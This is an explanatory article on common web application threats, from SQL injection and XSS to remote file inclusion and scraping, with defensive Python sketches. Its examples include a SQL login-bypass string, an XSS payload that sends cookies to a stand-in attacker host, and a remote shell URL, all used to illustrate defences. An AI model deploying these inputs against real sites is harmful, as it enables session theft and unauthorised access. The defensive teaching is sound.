Common threats to web applications

Web attacks refer to a category of cyber-attacks that generally occur on or through a website. The most common ones are SQL injection, cross-site scripting, remote file inclusion and brute force attacks. The risk of attack that each website faces depends on the attacker's motives, the security of the site and the information assets at stake. Regardless of the risk, web admins can follow a best practices approach to securing their sites. The following are among the most serious threats facing web applications.

Injection attacks

An injection attack occurs when an attacker supplies malicious data to an interpreter. The most common injection attack targets SQL databases. In this case, the attacker formulates a command and passes it to the application as data, either by writing the command in an input text box or by including it as part of a URL. A common example is attacking the username/password input boxes by entering a command string instead of a normal username and password.
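To illustrate the idea, here is a minimal sketch in Python (using sqlite3 and an assumed users table) of a login query built by string concatenation and the kind of input that subverts it:

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")  # demo data only

    # Vulnerable pattern: user input is pasted directly into the SQL command.
    username = "alice' --"   # attacker-supplied value from the login form
    password = "anything"
    query = ("SELECT * FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")

    # The trailing comment marker (--) cuts off the password check entirely,
    # so the query returns alice's row without a valid password.
    print(conn.execute(query).fetchall())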

If the application is vulnerable, it may process the command, giving the attacker some level of control such as the ability to retrieve or manipulate data. To protect an application against injection attacks, one can use prepared statements. Prepared statements define all of the SQL code up front; parameters are then passed to the query separately. This practice helps the database to differentiate data from commands.
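The following is a sketch of the same lookup as a prepared (parameterized) statement, again using Python's sqlite3 module; the placeholder syntax varies between database drivers:

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")  # demo data only

    username = "alice' --"   # the same malicious input as before
    password = "anything"

    # The SQL text is fixed and the values are bound separately, so the driver
    # treats the attacker's string as plain data rather than as SQL code.
    row = conn.execute(
        "SELECT * FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    print(row)  # None -- the injected string no longer matches any user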

Broken authentication

If a system still uses default credentials or insecure session management practices, it may be unable to reliably distinguish between authenticated and unauthorized users. Admins should use multi-factor authentication to make it harder for attackers to misuse stolen credentials. They should also change default credentials, audit passwords and base their password policy on the NIST SP 800-63B guidelines. Administrators should also create a policy that covers credential recovery and revocation and the handling of failed login attempts, and they should use server-side session management whenever possible.


Image: illustration of session stealing by OWASP
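As one small, concrete piece of session hygiene, the snippet below shows how a Flask application (the framework is an assumption, chosen only for illustration) can be configured so that session cookies cannot be read by scripts, travel only over HTTPS, are dropped from most cross-site requests and expire after a period of inactivity:

    from datetime import timedelta

    from flask import Flask

    app = Flask(__name__)
    app.config.update(
        SECRET_KEY="replace-with-a-long-random-value",  # signs the session cookie
        SESSION_COOKIE_HTTPONLY=True,                   # not readable from JavaScript
        SESSION_COOKIE_SECURE=True,                     # only sent over HTTPS
        SESSION_COOKIE_SAMESITE="Lax",                  # dropped from most cross-site requests
        PERMANENT_SESSION_LIFETIME=timedelta(minutes=30),  # idle sessions expire
    )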

Broken access control

Access control policies enforce resource access levels for different users. A system with broken access control may give a user more permissions than they need to fulfill their role. Access control is typically managed through groups, where all users in a group have access to the same functions and content. Because developers tend to overlook the complexity of creating a clear and effective access control policy, they often end up writing haphazard rules for each user. This makes it easier for attackers to discover and exploit weaknesses in the resulting access controls.
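A deliberately simple sketch of group-based access control follows, with hypothetical group and action names; the point is that every permission check goes through one central mapping rather than ad hoc rules per user:

    # Map each group to the actions its members may perform (names are illustrative).
    PERMISSIONS = {
        "viewer": {"read_report"},
        "editor": {"read_report", "edit_report"},
        "admin":  {"read_report", "edit_report", "delete_report", "manage_users"},
    }

    def is_allowed(user_groups, action):
        """Return True if any of the user's groups grants the requested action."""
        return any(action in PERMISSIONS.get(group, set()) for group in user_groups)

    print(is_allowed(["viewer"], "delete_report"))  # False
    print(is_allowed(["admin"], "delete_report"))   # True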

Developers should block path traversal requests, which attempt to access resources directly by supplying a relative path to them. They should also prevent sensitive pages from being cached in users' browsers to stop attackers from stealing authenticated sessions.
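One common way to block path traversal is to resolve the requested path and confirm that it still falls inside the directory meant to be served; a minimal sketch (the web root path is an assumption):

    from pathlib import Path

    BASE_DIR = Path("/var/www/app/public").resolve()  # assumed web root

    def safe_resolve(requested):
        """Resolve a user-supplied path and reject anything outside BASE_DIR."""
        candidate = (BASE_DIR / requested).resolve()
        if BASE_DIR != candidate and BASE_DIR not in candidate.parents:
            raise PermissionError("path traversal attempt blocked")
        return candidate

    # safe_resolve("css/site.css")      -> allowed
    # safe_resolve("../../etc/passwd")  -> PermissionError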

Backdoor attack

A backdoor attack involves installing malware that can bypass normal system authentication to give the attacker remote access at any time. The attacker then uses the malware to issue commands to the application remotely. The malware can be installed through remote file inclusion. Backdoors installed on web servers are typically used to launch distributed denial-of-service (DDoS) attacks, exfiltrate data and infect users who visit the site. They are also commonly used in advanced persistent threat (APT) campaigns because they are difficult to detect and can stay on the server for a long time.

Since backdoors are usually installed by exploiting some other weakness such as remote file inclusion, prevention involves addressing the vulnerabilities that allow file inclusion. For already-infected systems, mitigation involves scanning the server's filesystem for known malware signatures. This approach is not very reliable because the malware may be encrypted or use other fully undetectable (FUD) techniques to conceal its activities. A more effective approach may involve tracking and blocking connection requests directed at the malicious shell.
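A rough sketch of the signature-scanning approach, hashing every file under an assumed web root and comparing the digests against a hypothetical list of known-bad SHA-256 values; as noted above, this only catches backdoors whose signatures are already known:

    import hashlib
    from pathlib import Path

    WEB_ROOT = Path("/var/www/app")  # assumed location of the application

    KNOWN_BAD_SHA256 = {
        # Hypothetical digests of known web-shell variants.
        "5f4dcc3b5aa765d61d8327deb882cf99f0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5",
    }

    def scan(root):
        """Yield file paths whose contents match a known malicious digest."""
        for path in root.rglob("*"):
            if path.is_file():
                digest = hashlib.sha256(path.read_bytes()).hexdigest()
                if digest in KNOWN_BAD_SHA256:
                    yield path

    for hit in scan(WEB_ROOT):
        print("possible backdoor:", hit)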

Cross-site request forgery (CSRF)

A cross-site request forgery (CSRF) attack causes a victim to perform actions involuntarily while they hold a valid session on a web app. It is also known as session riding because it relies on compromising a user with an ongoing session. CSRF attacks can lead users to perform dangerous actions such as transferring funds, and if the attack succeeds against an administrator, the whole application can be compromised.

Since this attack is normally used to force the victim to perform some transaction, popular defenses have traditionally focused on hardening the business logic. However, this approach and similar strategies have been shown to be ineffective. Instead, the use of anti-CSRF tokens and same-site cookies is a more effective defense.
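A minimal sketch of the anti-CSRF token idea using Python's standard library: the server stores a random token in the user's session, embeds it in each form, and rejects any state-changing request whose token does not match (framework integration is omitted):

    import hmac
    import secrets

    def issue_csrf_token(session):
        """Store a fresh random token in the server-side session and return it."""
        token = secrets.token_urlsafe(32)
        session["csrf_token"] = token
        return token  # embed this in a hidden form field or request header

    def verify_csrf_token(session, submitted):
        """Compare the submitted token with the stored one in constant time."""
        expected = session.get("csrf_token", "")
        return bool(expected) and hmac.compare_digest(expected, submitted)

    session = {}
    token = issue_csrf_token(session)
    print(verify_csrf_token(session, token))     # True  (legitimate form submission)
    print(verify_csrf_token(session, "forged"))  # False (cross-site request)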

Cross-site scripting (XSS)

A cross-site scripting (XSS) attack involves injecting malicious code into a legitimate website in an attempt to compromise anyone who visits it. The attack occurs when a visitor's web browser loads the script and executes it without noticing that it is malicious. The victim's browser has no way of identifying that the script may cause harm, since the script appears to come from a legitimate site. The attacker will usually program the script to steal authentication tokens, cookies or other cached information stored in the victim's browser that they deem useful.

Preventing XSS attacks requires addressing the vulnerability that allows code injection. Typically, this entails escaping, sanitizing and validating user input. Escaping prevents the application from interpreting key characters that were maliciously inserted into the input. Input validation disallows the use of special characters in user input, while input sanitization reformats user input into a harmless form.
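Below is a small sketch of output escaping and input validation using Python's standard library; the character policy in the validator is an assumption, and real applications would normally rely on their template engine's automatic escaping rather than doing this by hand:

    import html
    import re

    def escape_for_html(user_input):
        """Escape characters that would otherwise be interpreted as markup."""
        return html.escape(user_input)  # turns < > & " ' into harmless entities

    def validate_username(user_input):
        """Allow only a conservative character set (an assumed policy)."""
        return bool(re.fullmatch(r"[A-Za-z0-9_.-]{1,32}", user_input))

    payload = '<script>new Image().src = "https://evil.example/?c=" + document.cookie</script>'
    print(escape_for_html(payload))    # rendered as inert text, not executed
    print(validate_username(payload))  # False -- rejected outright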

Man-in-the-middle attack

A man-in-the-middle attack is used to intercept communication between two parties. It takes several forms, including the use of a rogue access point, DNS spoofing and ARP spoofing. Sniffing, packet injection, session hijacking and SSL stripping are the most common techniques used to execute it.

Since the attack is mostly executed on wireless networks, using strong encryption can help reduce the risk of unwanted parties joining the network. VPNs also offer a secure channel between the communicating nodes that a third party cannot join. Finally, forcing all traffic from the browser (say, by using plugins) to use HTTPS can render the SSL stripping technique unusable.
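A complementary server-side measure is to redirect plain HTTP to HTTPS and send an HSTS header so that returning browsers refuse downgraded connections; the sketch below uses Flask, and the framework choice and max-age value are assumptions:

    from flask import Flask, redirect, request

    app = Flask(__name__)

    @app.before_request
    def force_https():
        # Redirect any plain-HTTP request to its HTTPS equivalent.
        if not request.is_secure:
            return redirect(request.url.replace("http://", "https://", 1), code=301)

    @app.after_request
    def add_hsts(response):
        # Ask returning browsers to use HTTPS only for the next year.
        response.headers["Strict-Transport-Security"] = "max-age=31536000; includeSubDomains"
        return response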

Phishing attack

Phishing is the fraudulent practice of attempting to obtain sensitive information through trickery. It involves fooling an unsuspecting user into opening an email or message with the ultimate aim of getting them to click on a link or download a file. The links usually lead the user to a fake website where they are again tricked into providing sensitive information. If the user downloads a file instead, it will typically carry a payload that allows the attacker to control the victim's computer. Although it may sound too obvious to fall for, a well-crafted phishing attack can succeed even against technical users. Originally, phishing was executed through email. Today, attackers also use other channels such as instant messaging and SMS, but email has remained the most prevalent attack channel.

Phishing attacks are among the most dangerous forms of cyber-attack. A successful compromise can hand an attacker a victim's full identity, including details such as credit card information. The main remedy against phishing is educating users: informed users are more likely to notice that they are being duped, since it is practically impossible to craft a perfect attack. However, user awareness alone is not enough. Anti-phishing software that uses artificial intelligence can help to further harden user systems.

Remote file inclusion

As the name suggests, this attack involves including a file (usually containing executable code) in the target application. The vulnerability results from allowing unsanitized, untrusted user input into the application. It is somewhat similar to an injection attack, the only difference being that a file, rather than code, is injected. A successful inclusion can lead to code execution on the server or on connected clients, denial of service, or disclosure of confidential information. PHP-based applications are the most common targets because the language makes it easy to include external input, but any language that allows the importation of external data into the application is potentially vulnerable.

The primary protection against file inclusion is to keep user input away from the application's framework and filesystem APIs. Since this is not always possible, the application can instead whitelist the files that may be included and use identifiers to refer to a particular file. With this tactic, the application can block any request that uses an unknown identifier.
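A minimal sketch of that identifier-based whitelist: user input selects a key, never a path or URL, and unknown identifiers are rejected (the identifiers and file names are assumptions):

    # Only these identifiers can ever be included; the paths are fixed by the developer.
    ALLOWED_INCLUDES = {
        "home":    "templates/home.html",
        "about":   "templates/about.html",
        "contact": "templates/contact.html",
    }

    def resolve_include(identifier):
        """Map a user-supplied identifier to a known file, or refuse."""
        try:
            return ALLOWED_INCLUDES[identifier]
        except KeyError:
            raise ValueError(f"unknown page identifier: {identifier!r}")

    print(resolve_include("about"))
    # resolve_include("http://evil.example/shell.txt") -> ValueError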

Web scraping

Web scraping is the process of extracting the HTML code and data of a website, normally using bots. The scraped content is usually used to build a duplicate site for phishing. The attack can also lead to loss of intellectual property or espionage if the targeted organization distributes content.

One common scraping attack involves fetching pricing information from competitor websites. Once the attacker has comparative pricing information about a product, they can easily undercut their competitors by pricing their own product lower. The attack works best against products whose prices fluctuate easily and whose customers are mainly seeking the best bargain.

Another scraping attack involves stealing content such as professional product reviews. It takes a real investment for a site to obtain such reviews in the first place; by contrast, an attacker can access all of that information easily and cheaply by scraping it from the target website. This attack can cause the target a severe loss on its investment.

It is often difficult to detect that a website is being scraped maliciously because the same process is used legitimately by search engines to index content and to perform market research, among other rightful purposes. However, protection can involve using a combination of mechanisms that detect and filter bot activity on the site, such as analyzing traffic behavior and monitoring requests from notorious IP addresses.
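One simple building block for such detection is a sliding-window request counter per client IP; the sketch below uses assumed thresholds and would, in practice, sit alongside IP reputation lists and more detailed behavioral analysis:

    import time
    from collections import defaultdict, deque

    WINDOW_SECONDS = 60   # assumed observation window
    MAX_REQUESTS = 120    # assumed ceiling for a human browsing session

    _requests = defaultdict(deque)  # client IP -> timestamps of recent requests

    def looks_like_scraper(client_ip, now=None):
        """Return True if the IP exceeds the request ceiling within the window."""
        now = time.time() if now is None else now
        window = _requests[client_ip]
        window.append(now)
        while window and now - window[0] > WINDOW_SECONDS:
            window.popleft()
        return len(window) > MAX_REQUESTS

    # Example: 200 requests within a couple of seconds trips the check.
    print(any(looks_like_scraper("203.0.113.7", now=i * 0.01) for i in range(200)))  # True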